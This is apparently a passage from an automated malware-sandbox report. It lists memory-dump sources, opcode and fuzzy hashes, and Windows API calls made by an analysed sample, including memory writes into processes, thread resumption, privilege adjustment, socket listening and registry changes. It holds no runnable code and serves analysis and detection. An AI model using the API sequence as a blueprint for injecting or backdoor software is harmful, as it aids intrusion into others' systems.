                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d5d0d3a13d219918641cbb0e443224e71e169868216ea03a35554c53224e314a
                                                                      • Instruction ID: 56126b48f425a7f86d08f315da40a7a31be73587559d20ed3264cb2ef927db04
                                                                      • Opcode Fuzzy Hash: d5d0d3a13d219918641cbb0e443224e71e169868216ea03a35554c53224e314a
                                                                      • Instruction Fuzzy Hash: A46187A0A0C7894FEB46AB74C8657A93BE1EF4A300F5540B6E44CCB6D7DEBC5C448361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dbc291980239682803fa36029aff058600f7b01945e44c3cc14c88b1859eb173
                                                                      • Instruction ID: 6242c2bbf5a382ef1d9615aec9c3d2ebd1cfc1f9d93c1649732ceabfad5c9bbc
                                                                      • Opcode Fuzzy Hash: dbc291980239682803fa36029aff058600f7b01945e44c3cc14c88b1859eb173
                                                                      • Instruction Fuzzy Hash: EB51EFB050C6899FE7429F24C9A47E93FE0FF06304F5541AAE84DCB193DBB89848C752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e784bba70a83aabdebd1c1bc35128773132636ac04020cd828e90eea022062d5
                                                                      • Instruction ID: 1b1a99c7dde7bd49e793ff89b21ae037681e517bc567c3b3ef8c7e86270fb9ec
                                                                      • Opcode Fuzzy Hash: e784bba70a83aabdebd1c1bc35128773132636ac04020cd828e90eea022062d5
                                                                      • Instruction Fuzzy Hash: BD517CB050D3C98FE7479B3488657557FA1AF47344F5A81EAE088CF1A3CAB89848C762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f5e1c64c8cac44466adbe243035f2a415f43945c3fd0e5b154854f1e626c0ebc
                                                                      • Instruction ID: b368381203f43d4522f95b1cdd2096fc383bebfc1811137538ea956ab5f08522
                                                                      • Opcode Fuzzy Hash: f5e1c64c8cac44466adbe243035f2a415f43945c3fd0e5b154854f1e626c0ebc
Non-executed Functions

Executed Functions

Strings
Memory Dump Source
• Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
Similarity
• API ID:
• String ID: :@:r$:@:r$:@:r$:@:r$:@:r$:@:r
• API String ID: 0-1552953164

Strings
Memory Dump Source
• Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
Similarity
• API ID:
• String ID: :@:r$:@:r$:@:r$:@:r
• API String ID: 0-1005175706

Strings
Memory Dump Source
• Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
Similarity
• API ID:
• String ID: :@:r$:@:r
• API String ID: 0-2124224625

Strings
Memory Dump Source
• Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
Similarity
• API ID:
• String ID: :@:r$:@:r
• API String ID: 0-2124224625

Strings
Memory Dump Source
• Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
Similarity
• API ID:
• String ID: :@:r$:@:r
• API String ID: 0-2124224625

APIs
Memory Dump Source
• Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

APIs
• bind.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05290EFF
Memory Dump Source
• Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
Similarity
• API ID: bind
• String ID:
• API String ID: 1187836755-0

APIs
• listen.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05290AE4
Memory Dump Source
• Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
Similarity
• API ID: listen
• String ID:
• API String ID: 3257165821-0

APIs
• AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 05294E9B
Memory Dump Source
• Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
Similarity
• API ID: AdjustPrivilegesToken
• String ID:
• API String ID: 2874748243-0

APIs
• GetAdaptersInfo.IPHLPAPI(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05292DC8
Memory Dump Source
• Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
Similarity
• API ID: AdaptersInfo
• String ID:
• API String ID: 3177971545-0

APIs
• bind.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05290EFF
Memory Dump Source
• Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
Similarity
• API ID: bind
• String ID:
• API String ID: 1187836755-0

APIs
• NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 05295B5C
Memory Dump Source
• Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
Similarity
• API ID: MemoryVirtualWrite
• String ID:
• API String ID: 3527976591-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • listen.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05290AE4
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: listen
                                                                      • String ID:
                                                                      • API String ID: 3257165821-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 052954C5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationQuerySystem
                                                                      • String ID:
                                                                      • API String ID: 3562636166-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetAdaptersInfo.IPHLPAPI(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05292DC8
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdaptersInfo
                                                                      • String ID:
                                                                      • API String ID: 3177971545-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 05294E9B
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdjustPrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 2874748243-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 05295B5C
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MemoryVirtualWrite
                                                                      • String ID:
                                                                      • API String ID: 3527976591-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: recv
                                                                      • String ID:
                                                                      • API String ID: 1507349165-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtResumeThread.NTDLL(?,?), ref: 05295AAB
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 052954C5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationQuerySystem
                                                                      • String ID:
                                                                      • API String ID: 3562636166-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • getaddrinfo.WS2_32(?,00000E2C), ref: 05293CC7
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getaddrinfo
                                                                      • String ID:
                                                                      • API String ID: 300660673-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • getnameinfo.WS2_32(?,00000E2C), ref: 052931A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getnameinfo
                                                                      • String ID:
                                                                      • API String ID: 1866240144-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegQueryValueExW.KERNEL32(?,00000E2C,?,?), ref: 02AFB802
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WSAIoctl.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05293479
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Ioctl
                                                                      • String ID:
                                                                      • API String ID: 3041054344-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 05293741
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(?,00000E2C), ref: 052959DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegSetValueExW.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05294A00
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: bc6981a0221060ca244e07788a5e1ee42156890651f65a66319fb100e1341237
                                                                      • Instruction ID: cba9a7584906eb025fcecd00e3633a87e8557d3ce8eac775602e53f811a920e6
                                                                      • Opcode Fuzzy Hash: bc6981a0221060ca244e07788a5e1ee42156890651f65a66319fb100e1341237
                                                                      • Instruction Fuzzy Hash: 05315E7100D3C15FDB238B648C50A62BFB8AF07210F1985DBE985DB1A3D2689849C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RasEnumConnectionsW.RASAPI32(?,00000E2C,?,?), ref: 0529215A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ConnectionsEnum
                                                                      • String ID:
                                                                      • API String ID: 3832085198-0
                                                                      • Opcode ID: 24b56c40e2ae7922b18d3b6a546ea476c5d0479fac0d0986a9a5a0eebf20d6aa
                                                                      • Instruction ID: 5e15d32ec03b400a9971bb9efe96abc5b5f34e4eb64339d3736ca2c8ef0057b1
                                                                      • Opcode Fuzzy Hash: 24b56c40e2ae7922b18d3b6a546ea476c5d0479fac0d0986a9a5a0eebf20d6aa
                                                                      • Instruction Fuzzy Hash: 38316B7540E3C05FD7138B358C65AA1BFB4EF87614B0E41DBD8848F1A3D2686909CB72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 02AFBCA9
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 1fd7dcef2200c760e916e88e0ebbe645515a58ce7068127f299f3d5441073043
                                                                      • Instruction ID: 5afb9836743c8f8845d5b219707da177b07ea2d67375184a574524b398bbc0a3
                                                                      • Opcode Fuzzy Hash: 1fd7dcef2200c760e916e88e0ebbe645515a58ce7068127f299f3d5441073043
                                                                      • Instruction Fuzzy Hash: 2F318FB1504380AFE722CB65CC44F62BFF8EF4A614F08849AF9848B252D775E909CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(?,00000E2C), ref: 052959DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: cf71b6e5ee05a6262e29ac888af1ca2be2f0c5b9592195a5806bc28b352c3642
                                                                      • Instruction ID: edb2ffbe26e0bd9445bef46f26ef22c5c9582881f46e139adfa9ebb4b0060844
                                                                      • Opcode Fuzzy Hash: cf71b6e5ee05a6262e29ac888af1ca2be2f0c5b9592195a5806bc28b352c3642
                                                                      • Instruction Fuzzy Hash: 43319271210301AFFB31CF65CC81FA6BBECEF04710F14896AFA459A291D6B1E905CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FormatMessageW.KERNEL32(?,00000E2C,?,?), ref: 052932CE
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FormatMessage
                                                                      • String ID:
                                                                      • API String ID: 1306739567-0
                                                                      • Opcode ID: 01119907805712a370f6d468fe15c668a7be8eaaefde06e58cd6041377e71e78
                                                                      • Instruction ID: 232954a14b0e87fc73c0c0c5d8b485f5a6c17d4e9411a1d24bd791df7fb3dafc
                                                                      • Opcode Fuzzy Hash: 01119907805712a370f6d468fe15c668a7be8eaaefde06e58cd6041377e71e78
                                                                      • Instruction Fuzzy Hash: DC317E7154E3C05FD7038B758C61A66BFB49F87610F1D80CBD8848F1A3D625691AC7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 05293936
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: 8d573500d29a2366819bf50f90c88062d7a4bcaf5a6eb0a3ca2f58948e4e57f0
                                                                      • Instruction ID: 46421ef113b002af48cfe967005a128daaac94bd6df91b457b4f328f7e58cdf6
                                                                      • Opcode Fuzzy Hash: 8d573500d29a2366819bf50f90c88062d7a4bcaf5a6eb0a3ca2f58948e4e57f0
                                                                      • Instruction Fuzzy Hash: B23193B1509784AFEB22CB24DC45F67FFA8EF46710F08849BED849B253D264A909C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 02AFABD5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: 632aaeedd911d1bfc1bf831eec1b2a54234c1875da7832768f0b1b737bf127b8
                                                                      • Instruction ID: 64c64cc3cb27f7d3849c96b113659dc8ccc6918351c79dabdba308eed6d5f800
                                                                      • Opcode Fuzzy Hash: 632aaeedd911d1bfc1bf831eec1b2a54234c1875da7832768f0b1b737bf127b8
                                                                      • Instruction Fuzzy Hash: AC31D672504384AFE7228B64CC45FA7BFACEF06710F04849BFD849B152D264A809C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: accept
                                                                      • String ID:
                                                                      • API String ID: 3005279540-0
                                                                      • Opcode ID: 8402fd7f197bba375e5d6edfecb0f042fdc14203a5fa541a3a70cf19e7196893
                                                                      • Instruction ID: cd74efcb6545f28e1e44713d3e0dd6935e825b9448285a6f13c274b7006acc17
                                                                      • Opcode Fuzzy Hash: 8402fd7f197bba375e5d6edfecb0f042fdc14203a5fa541a3a70cf19e7196893
                                                                      • Instruction Fuzzy Hash: 1D3191B1509780AFEB12CB25DC45F96FFF8EF06314F08849AE9849B253D375A909CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • getnameinfo.WS2_32(?,00000E2C), ref: 052931A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getnameinfo
                                                                      • String ID:
                                                                      • API String ID: 1866240144-0
                                                                      • Opcode ID: 705f24bf1793c27fccb7d513ce021755aa76d4d711217a222caaf0ae8fc94e17
                                                                      • Instruction ID: 074014b39be19a81269ff689f77c1fde2d94349cf7c337d8930aa813c16f77dd
                                                                      • Opcode Fuzzy Hash: 705f24bf1793c27fccb7d513ce021755aa76d4d711217a222caaf0ae8fc94e17
                                                                      • Instruction Fuzzy Hash: 1D219172510204AFEB20CF65DC81FABFBECEF04710F04896AEA46CA251DA70E548CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetProcessTimes.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05290CB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ProcessTimes
                                                                      • String ID:
                                                                      • API String ID: 1995159646-0
                                                                      • Opcode ID: 654450cead337efdcf8dcbe3de86ae2f40e29ec3ca6ff1baab1614dd7f4a5f1e
                                                                      • Instruction ID: 117e36621f830b4cf3eb28613938244420e5ddfc286fb040b93290db127135b2
                                                                      • Opcode Fuzzy Hash: 654450cead337efdcf8dcbe3de86ae2f40e29ec3ca6ff1baab1614dd7f4a5f1e
                                                                      • Instruction Fuzzy Hash: 3731C572509384AFEB12CF24DC45FA6BFB8EF46314F0884DBE9859B153C225A905C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegQueryValueExW.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 02AFACD8
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: 89bae1ac82663a6d3d099d1a934e3adbef52366ee0dd62ba283bd892ccbb146e
                                                                      • Instruction ID: a442a37e226e23d1471e36ad09146cf475bb20e81c6bef00b672695aefd2701b
                                                                      • Opcode Fuzzy Hash: 89bae1ac82663a6d3d099d1a934e3adbef52366ee0dd62ba283bd892ccbb146e
                                                                      • Instruction Fuzzy Hash: B231B372104384AFE722CF61CC84FA2BFF8EF06314F18849AE9858B253D764E449CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileView
                                                                      • String ID:
                                                                      • API String ID: 3314676101-0
                                                                      • Opcode ID: 937d7fd2b81a006f0c47555255579f4b9f95de8997fae2a99ee9fb91780baa0e
                                                                      • Instruction ID: 3e8372b15ca2aca4a4487638346427cf842f4d78a80e44fd9032f8a29cbca4ab
                                                                      • Opcode Fuzzy Hash: 937d7fd2b81a006f0c47555255579f4b9f95de8997fae2a99ee9fb91780baa0e
                                                                      • Instruction Fuzzy Hash: F831C2B2404784AFE722CB55DC45F96FFF8EF06320F04859EE9849B262D365A909CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetTokenInformation.KERNELBASE(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 02AFB06C
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationToken
                                                                      • String ID:
                                                                      • API String ID: 4114910276-0
                                                                      • Opcode ID: ee96b00ccf1839cdfa5f7aa78ce07173b08cf7de8252ad72a4876826ee5420b0
                                                                      • Instruction ID: 697970b3881ab314b0c2e38ff8e8eb414844a93c81adcf78298cc79b597a3d76
                                                                      • Opcode Fuzzy Hash: ee96b00ccf1839cdfa5f7aa78ce07173b08cf7de8252ad72a4876826ee5420b0
                                                                      • Instruction Fuzzy Hash: B831C371109380AFD712CB64DC85F97BFB8EF06310F0884ABEA85DB152D264A908C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateMutexW.KERNEL32(?,?), ref: 052909F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateMutex
                                                                      • String ID:
                                                                      • API String ID: 1964310414-0
                                                                      • Opcode ID: 6232730f93d18c6e7f5ee8b2811a4c5cc2a5c2bb588e8f6b5b26213d55773e40
                                                                      • Instruction ID: eb3e213cf9827c9c0d510fecc7820e7258d8d49b786bfa8767c0671daf8a83fd
                                                                      • Opcode Fuzzy Hash: 6232730f93d18c6e7f5ee8b2811a4c5cc2a5c2bb588e8f6b5b26213d55773e40
                                                                      • Instruction Fuzzy Hash: 7131C3B1509384AFE712CF25CC85F56FFE8EF06610F08849EE9888B292D375E904CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LsaOpenPolicy.ADVAPI32(?,00000E2C), ref: 02AFB38F
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: OpenPolicy
                                                                      • String ID:
                                                                      • API String ID: 2030686058-0
                                                                      • Opcode ID: 2d45a8758f3d3aa1cdf53623afd65f199c41ef79cdaf490b41bfbd397d259217
                                                                      • Instruction ID: a922968c20e89d8b0121188fdfa6f90bce8d2469911ce97ec4ef933d19d98d0b
                                                                      • Opcode Fuzzy Hash: 2d45a8758f3d3aa1cdf53623afd65f199c41ef79cdaf490b41bfbd397d259217
                                                                      • Instruction Fuzzy Hash: 8F219172504344AFE721CF64DC85F6ABFB8EF46710F18899AED849B252D364A808CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • getaddrinfo.WS2_32(?,00000E2C), ref: 05293CC7
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getaddrinfo
                                                                      • String ID:
                                                                      • API String ID: 300660673-0
                                                                      • Opcode ID: 62a43bd5e892fc5187e690216c7b049af34832150331a0ed9ef6deeb04bae326
                                                                      • Instruction ID: 006f8b254fb4deaed064b3655e779c3da6a69b25a113da41e7b2ba7606674b6f
                                                                      • Opcode Fuzzy Hash: 62a43bd5e892fc5187e690216c7b049af34832150331a0ed9ef6deeb04bae326
                                                                      • Instruction Fuzzy Hash: D021D371100304BFFB20DB64CC85FA6FBACEF44710F10895AFE459A241D6B5A9098BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • K32GetModuleInformation.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 0529521E
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationModule
                                                                      • String ID:
                                                                      • API String ID: 3425974696-0
                                                                      • Opcode ID: 6b6d66c6e3b640d1732d1555791b739ee683df46312ce14467c839f4df771df5
                                                                      • Instruction ID: a87fb3168cdb1184405fb0dd7068e9e94ed18d8a2c3401d0db2a9d469072f0ca
                                                                      • Opcode Fuzzy Hash: 6b6d66c6e3b640d1732d1555791b739ee683df46312ce14467c839f4df771df5
                                                                      • Instruction Fuzzy Hash: 9F21B671609380AFEB12CB25DC44F67BFACEF46310F08849BE985CB252D265E809CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegOpenCurrentUser.KERNEL32(?,00000E2C), ref: 05293635
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CurrentOpenUser
                                                                      • String ID:
                                                                      • API String ID: 1571386571-0
                                                                      • Opcode ID: 89d48415691034715110d5c88ec7ded6be0e40983962f162443a76be3de28461
                                                                      • Instruction ID: a00ca40164922f8f81eab99cdbc7f16dae1db83a91a189b177457423b3368d92
                                                                      • Opcode Fuzzy Hash: 89d48415691034715110d5c88ec7ded6be0e40983962f162443a76be3de28461
                                                                      • Instruction Fuzzy Hash: EE21B171409384AFEB12CB24DC45F66BFA8EF46710F08849BED849F253D264A909CB75
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • gethostname.WS2_32(?,00000E2C,?,?), ref: 02AFA1C2
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: gethostname
                                                                      • String ID:
                                                                      • API String ID: 144339138-0
                                                                      • Opcode ID: b12a611b4489d4efb89c77cd8b439ba5d6f694fd685b026bb3a30f6d443a190b
                                                                      • Instruction ID: c2a0ff5611e513bc808e2965131e4178a6e692ae78213cabc749bc792adf306d
